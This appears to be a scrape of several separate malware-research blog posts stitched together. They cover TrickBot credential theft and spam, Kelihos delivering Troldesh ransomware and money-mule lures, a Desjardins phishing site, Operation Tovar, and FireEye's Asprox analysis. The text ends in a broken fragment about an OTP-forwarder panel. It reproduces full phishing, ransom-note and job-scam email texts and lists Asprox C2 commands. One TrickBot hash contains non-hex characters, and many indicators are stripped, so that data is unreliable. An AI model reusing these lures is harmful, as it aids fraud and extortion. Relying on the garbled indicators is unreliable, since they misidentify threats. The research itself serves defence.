A couple of weeks ago, Gary (the boss) asked me to look into TrickBot samples as they are known to extract Outlook credentials (malwarebytes blog) and he needed confirmation. I ran the samples through Cuckoo sandbox but couldn’t gather much information because of the short run time.  As is often the case, many malware samples don't show their full capabilities without informed human interaction.  Therefore, I moved on to my favorite thing “Double click and wait for the magic.”

First Stage – Extracting the Config File

During the first run, Clifford Wilson, a new malware researcher in our lab, helped in extracting some valuable indicators. In the initial stage, we found out that when testing the TrickBot binary:

Original binary hash – 0c9b1b5ce3731bf8dbfe10432b1f0c2ff48d3ccdad6a28a6783d109b1bc07183
Downloaded binary hash - ce806899fc6ef39a6f9f256g4dg3d568e46696c8306ef8ge96f348g9a68g6660

The original binary launches a child process and then it gets replaced by a different binary that is downloaded. The downloaded binary launches a child process and the TrickBot sample gets activated after these steps.

When analyzing we found out that it launches several “svchost.exe,” it varies from 4 to 7 depending upon the time of your run.

Fig. 1: TrickBot binary with "svchost.exe"

Each of the scvhost instances have their own significance:

Svchost 1: Appears to be used to search and receive certificates

Svchost 2:  Contains strings referring to 127 different financial institutions. (complete list is mentioned below)

Svchost 3: Is the one that collects data from Outlook\Profiles such as username, password, servers, ports
Fig. 2: Outlook exfiltration 

Svchost 4: Scans the internet history to search for stored credentials

Svchost 5: Contain a list of random email ids, research is being to understand the use of those emails.

Confirmation of Svchost being launched by TrickBot binary

In order to confirm our hypothesis about the various svchost being launched by a single process and not more than one processes, researchers tested a different binary and found the results to be identical. We used Process Monitor to confirm the creation of "Svchost.exe" by the same process.

Fig. 3: Svchost Create Process

Config File : Svchost 2


This is the comprehensive list of all the unique financial institutions mentioned in the Svchost 2. It will be safe to assume that the TrickBot binary is targeting these institutions.  We have demonstrated that some of the brands experience quite sophisticated injections, prompting for the entry of credit card, date of birth, or mother's maiden name information, which is sent to the criminal.

The binary creates a folder 'winapp' under Roaming and stores all the files in that location, which is covered in the MalwareBytes blog. If your institution is here and you need more information about the inject script, contact us.

An update on the MalwareBytes blog is that the it downloads an executable named "Setup.exe" under WinApp. The interesting thing about the executable is that it is downloaded as a png and then converted into an exe. The URLs the executable is downloaded are:


Fig. 4: File being downloaded as Png

Fig. 5: Downloaded Executable
These downloaded files are also the TrickBot binary.

Fig. 6: Setup.exe under WinApp
The downloaded files being converted into "Setup.exe" and can be found under the Roaming/WinApp directory.

Second Stage - Spam aka 'Pill Spam'

After the completion of initial analysis, there was a strange pattern observed when analyzed the Wireshark traffic with 'IMF' filter. Our network ( was used as a server along with being a proxy. Our address was proxy for other messages coming from (a mailserver hosted by Terra Network Operations in Coral Gables, Florida) and (a mailserver in Prague, Czech Republic.) Also, our network was sending outbound spam.

Fig. 7: Wireshark capture with IMF filter

Outbound Spam

As can be seen in the figure 7, top 3 spam messages are outbound and are being sent from our network. There were total of 6 different spam messages with different subject line and links. The email is mentioned below:

Fig. 8: Email message

Following were some of the subjects and urls that were spammed.

Subject                                                    URL
 Affordable-priced Brand Pilules http://martinagebhardt[.]hu/w/1gox[.]php
 Blue Pills easy-ordering http://host[.]teignmouthfolk[.]co[.]uk/w/zxaj[.]php
 Eromedications Wholesale http://martinagebhardt[.]hu/w/1pyo[.]php
 Great offers on Male Pills http://host.bhannu[.]com/w/w10x[.]php
 Here we sell Branded tablets http://host[.]selfcateringintenerife[.]co[.]uk/w/l5fz[.]php
 Online offers Branded pharmacueticals http://host[.]iceskatemag[.]co[.]uk/w/lztg[.]php

When we visited these links they redirect to a counterfeit pill website featuring pain and anxiety medications such as Xanax, Tramadol, Ambien, Phentermine, and more.  A depiction of the pill website with affiliate id is shown below.

Fig. 9: Redirect to a pill website with aff id

When we tried to analyze these weblinks individually, they contained a list of php under the 'w' directory. Last, when tree walked just to the domain it led to a dating/porn website.

Inbound Spam

As can be seen in the Figure 3, there is a significant amount of inbound traffic that seems to be different spam messages redirected through our machine. It can be inferred that our network is used as proxy to avoid back tracking and detection. There were bunch of different domains that were used in the "From" addresses of these messages. An example of one such message is:

From: Walmart
To: Grazielle
Subject: =?UTF-8?Q?Huge_Clearance_savings_you_can=E2=80=99t_miss?=

The capture contained different messages from all the following domains mentioned below:

Credential Exchange

TrickBot displays a similar characteristic to the Kelihos Botnet , in a sense that it logs in to the mail server with the stolen credentials before it starts to send spam. There is a massive number of stolen credentials that were visible in plain text being distributed by the botnet.

Fig. 10: Stolen Credentials reconstructed in Network Miner

With these analysis, it is safe to assume that TrickBot is extremely tricky!! Researchers at UAB are focused to try and uncover more secrets of this malware. Will keep everyone posted with our new findings!!

To sum up, TrickBot is not only targeting your BANKING credentials but also sending you SPAM.

NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB,  is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of embedded URLs within the email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduce itself to the world of ransomware by spamming links to Wildfire ransomware followed by CryptFIle2 ransomware in August. Then, it shifted its focus towards different banking trojans such as Panda Zeus, Nymain and Kronos. Now, it took a complete circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypted the files with the extension ".no_more_ransom". Moreover, the URLs spammed were redirected to download a JavaScript file and a Microsoft Word document. This is the first time that Kelihos malware has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using the Credit Debt theme. The most important fact is that some of the URLs were redirected to download a .zip file containing a JavaScript file, while other links download a Microsoft Word document. When writing this blog, most of the URLs were still live. 

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 

Sincerely Yours,
Bank of America
Customer Relations Department

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 

Subject - Pay for Credit Debt when Possible - 

Subject - Please Settle Credit Arrears Shortly - 

Subject - You Have a 3-Month Credit Debt - 

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 

Subject - You Have a 3-Month Credit Debt - 

URL that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down

Infection by JavaScript has not been an associated behavior with Kelihos. Hence, it can be considered a noticeable change and well-thought out strategy by the bot operators.

Hashes of the JavaScript and Word document are:

    1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs for Microsoft Word documents have been seen before. The document performed in a similar fashion requesting to enable the macros by clicking "Enable Content" aka "Encrypt Me" button. After this process it downloads a payload from the following link:

MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
Install it and type the following address into the address bar:
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:

The above is a plain text version of the ransom note. As it can be seen, a Gmail address is being use, which is one of its kind behavior.

Troldesh did not stop trolling the victim there, it downloads the PONY malware and contacts its command and control center at this location:


When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The files eventually encrypt the system but it also downloads the Pony malware to steal all the information from the victim's computer. Hence, causing a double blow to the victim.

Money Mule Spam 

Kelihos botnet was not in a mood to stop. It also sent Money Mule spam geo-targeting users with the ".us" United States email address. It impersonated a company from 'China looking for employees'. 

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the email addresses use AOL domains, which is a unique thing in itself.

To conclude, Kelihos has been surprising the researchers quite often and it has become necessary to keep track of different activities of the botnet. The ransomware inclusion brings interesting twists from the research as well as law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware. 

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!

Kelihos Botnet sending geo-targeted Desjardins Phish to Canadians

As we mentioned in our blog last week (see: Kelihos botnet sending Panda Zeus to German and UK Banking Customers), the Kelihos botnet is now using "geo-targeting" based on the ccTLD portion of email addresses.  Today, those recipients whose email address ends in ".ca" are receiving a French language spam message advertising one of many Desjardins phishing websites:

<== French Desjardins Phishing Email || Google Translate ==> 
Some of the email subjects being used include:

Subject:  Renouvellement de votre compte Desjardins
Subject:  Solutions en ligne Desjardins
Subject:  Veuillez regulariser votre compte Acces
Subject:  Desjardins Reactivation
Subject:  Reactivation de votre compte AccesD

Each of these URLs is currently resolving to the IP address


Here is a pictorial walk-through of the phishing website:

We begin by entering a Credit Card number -- it must be a number that passes a Luhn check:

After entering a valid CC#, the next page asks the phishing victim for three security questions and their answers:

And lastly, the phisher's try to get any and all possible additional information they can!

Only after entering a valid password and a number that matches the mathematical rules for a Canadian Social Insurance Number does the phisher send the victim to the real Desjardins website!

Beware, Canadian friends!   And let us hope that our shared victimization increases our mutual law enforcement agencies desire to stop this botnet!

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately I hit "publish" I spotted this article pop up on Zdnet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long suffering colleagues. In this case though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid... but a botnet client means you might be part of something illegal, and you'd never know the difference.

Operation Tovar: The Latest Attempt to Eliminate Key Botnets

Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted using their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

Gameover ZeuS

Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.

Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.

ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.


Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without back ups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, located on the criminals’ servers, infected files probably cannot be decrypted.

The Target

Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

The Takeover

Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takeovers over Kelihos have been undone after only two weeks.

The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.

A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware

Executive Summary

FireEye Labs has been tracking a recent spike in malicious email detections that we attribute to a campaign that began in 2013. While malicious email campaigns are nothing new, this one is significant in that we are observing mass-targeting attackers adopting the malware evasion methods pioneered by the stealthier APT attackers. And this is certainly a high-volume business, with anywhere from a few hundred to ten thousand malicious emails sent daily – usually distributing between 50 and 500,000 emails per outbreak.

Through the FireEye Dynamic Threat Intelligence (DTI) cloud, FireEye Labs discovered that each and every major spike in email blasts brought a change in the attributes of their attack. These changes have made it difficult for anti-virus, IPS, firewalls and file-based sandboxes to keep up with the malware and effectively protect endpoints from infection. Worse, if past is prologue, we can expect other malicious, mass-targeting email operators to adopt this approach to bypass traditional defenses.

This blog will cover the trends of the campaign, as well as provide a short technical analysis of the payload.

Campaign Details


Figure 1: Attack Architecture

The campaign first appeared in late December of 2013 and has since been seen in fairly cyclical patterns each month. It appears that the threat actors behind this campaign are fairly responsive to published blogs and reports surrounding their malware techniques, tweaking their malware accordingly to continuously try and evade detection with success.

In late 2013, malware labeled as Kuluoz, the specific spam component of the Asprox botnet, was discovered to be the main payload of what would become the first malicious email campaign. Since then, the threat actors have continuously tweaked the malware by changing its hardcoded strings, remote access commands, and encryption keys.

Previously, Asprox malicious email campaigns targeted various industries in multiple countries and included a URL link in the body. The current version of Asprox includes a simple zipped email attachment that contains the malicious payload “exe.” Figure 2 below represents a sample message while Figure 3 is an example of the various court-related email headers used in the campaign.


Figure 2 Email Sample


Figure 3 Email Headers

Some of the recurring campaign that Asporox used includes themes focused around airline tickets, postal services and license keys. In recent months however, the court notice and court request-themed emails appear to be the most successful phishing scheme theme for the campaign.

The following list contains examples of email subject variations, specifically for the court notice theme:

  • Urgent court notice
  • Notice to Appear in Court
  • Notice of appearance in court
  • Warrant to appear
  • Pretrial notice
  • Court hearing notice
  • Hearing of your case
  • Mandatory court appearance

The campaign appeared to increase in volume during the month of May. Figure 4 shows the increase in activity of Asprox compared to other crimewares towards the end of May specifically. Figure 5 highlights the regular monthly pattern of overall malicious emails. In comparison, Figure 6 is a compilation of all the hits from our analytics.


Figure 4 Worldwide Crimeware Activity


Figure 5 Overall Asprox Botnet tracking


Figure 6 Asprox Botnet Activity Unique Samples

These malicious email campaign spikes revealed that FireEye appliances, with the support of DTI cloud, were able to provide a full picture of the campaign (blue), while only a fraction of the emailed malware samples could be detected by various Anti-Virus vendors (yellow).


Figure 7 FireEye Detection vs. Anti-Virus Detection

By the end of May, we observed a big spike on the unique binaries associated with this malicious activity. Compared to the previous days where malware authors used just 10-40 unique MD5s or less per day, we saw about 6400 unique MD5s sent out on May 29th. That is a 16,000% increase in unique MD5s over the usual malicious email campaign we’d observed. Compared to other recent email campaigns, Asprox uses a volume of unique samples for its campaign.


Figure 8 Asprox Campaign Unique Sample Tracking


Figure 9 Geographical Distribution of the Campaign


Figure 10 Distribution of Industries Affected

Brief Technical Analysis


Figure 11 Attack Architecture


The infiltration phase consists of the victim receiving a phishing email with a zipped attachment containing the malware payload disguised as an Office document. Figure 11 is an example of one of the more recent phishing attempts.


Figure 12 Malware Payload Icon


Once the victim executes the malicious payload, it begins to start an svchost.exe process and then injects its code into the newly created process. Once loaded into memory, the injected code is then unpacked as a DLL. Notice that Asprox uses a hardcoded mutex that can be found in its strings.

  1. Typical Mutex Generation
    1. "2GVWNQJz1"
  2. Create svchost.exe process
  3. Code injection into svchost.exe


Once the dll is running in memory it then creates a copy of itself in the following location:


Example filename:


It’s important to note that the process will first check itself in the startup registry key, so a compromised endpoint will have the following registry populated with the executable:



The malware uses various encryption techniques to communicate with the command and control (C2) nodes. The communication uses an RSA (i.e. PROV_RSA_FULL) encrypted SSL session using the Microsoft Base Cryptographic Provider while the payloads themselves are RC4 encrypted. Each sample uses a default hardcoded public key shown below.

Default Public Key






-----END PUBLIC KEY-----

First Communication Packet

Bot ID RC4 Encrypted URL

POST /5DBA62A2529A51B506D197253469FA745E7634B4FC


Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: <host useragent>

Host: <host ip>:443

Content-Length: 319

Cache-Control: no-cache


C2 Commands

In comparison to the campaign at the end of 2013, the current campaign uses one of the newer versions of the Asprox family where threat actors added the command “ear.”

if ( wcsicmp(Str1, L"idl") )


if ( wcsicmp(Str1, L"run") )


if ( wcsicmp(Str1, L"rem") )


if ( wcsicmp(Str1, L"ear")


if ( wcsicmp(Str1, L"rdl") )


if ( wcsicmp(Str1, L"red") )


if ( !wcsicmp(Str1, L"upd") )

C2 commands Description
idl idl This commands idles the process to wait for commands This commands idles the process to wait for commands
run run Download from a partner site and execute from a specified path Download from a partner site and execute from a specified path
rem rem Remove itself Remove itself
ear ear Download another executable and create autorun entry Download another executable and create autorun entry
rdl rdl Download, inject into svchost, and run Download, inject into svchost, and run
upd upd Download and update Download and update
red red Modify the registry Modify the registry

C2 Campaign Characteristics


For the two major malicious email campaign spikes in April and May of 2014, separate sets of C2 nodes were used for each major spike.

April May-June


The data reveals that each of the Asprox botnet’s malicious email campaigns changes its method of luring victims and C2 domains, as well as the technical details on monthly intervals. And, with each new improvement, it becomes more difficult for traditional security methods to detect certain types of malware.


Nart Villeneuve, Jessa dela Torre, and David Sancho. Asprox Reborn. Trend Micro. 2013.


OTP forwarder dumped months ago.






Send a command:

Commands sent:


Apps builder:


App settings:


Second panel, a bit different, look like a 'test' one.


Phone search:


RSA Security talked also about it here